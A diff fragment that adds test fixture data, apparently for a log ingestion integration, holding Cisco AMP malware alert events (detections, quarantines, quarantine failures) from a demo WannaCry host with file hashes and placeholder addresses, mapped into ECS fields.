+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419303565650558983",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843617007Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303569945526000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558982",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843618896Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303569945526000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558980",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843620759Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303569945526000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558979",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843622635Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303569945526000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558978",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 2920,
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "name": "taskse.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe",
+                "hash": {
+                    "sha1": "be5d6279874da315e3080b06083757aad9b32c23",
+                    "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d",
+                    "md5": "8495400f199ac77853c53b5a3f278f3e"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d",
+                    "8495400f199ac77853c53b5a3f278f3e",
+                    "be5d6279874da315e3080b06083757aad9b32c23"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843624521Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303569945526000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.2CA2D550E6-100.SBX.VIOC",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303569945526290",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 2920,
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "name": "taskdl.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe",
+                "hash": {
+                    "sha1": "47a9ad4125b6bd7c55e4e7da251e23f089407b8f",
+                    "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79",
+                    "md5": "4fef5e34143e646dbf9907c4374276f5"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79",
+                    "4fef5e34143e646dbf9907c4374276f5",
+                    "47a9ad4125b6bd7c55e4e7da251e23f089407b8f"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843639044Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419303569945526000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.4A468603FD.04426d77.auto.Talos",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419303569945526289",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843642931Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419303569945526000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419303565650558981",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:10.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843644903Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419303569945526000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419303565650558977",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:09.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843646784Z",
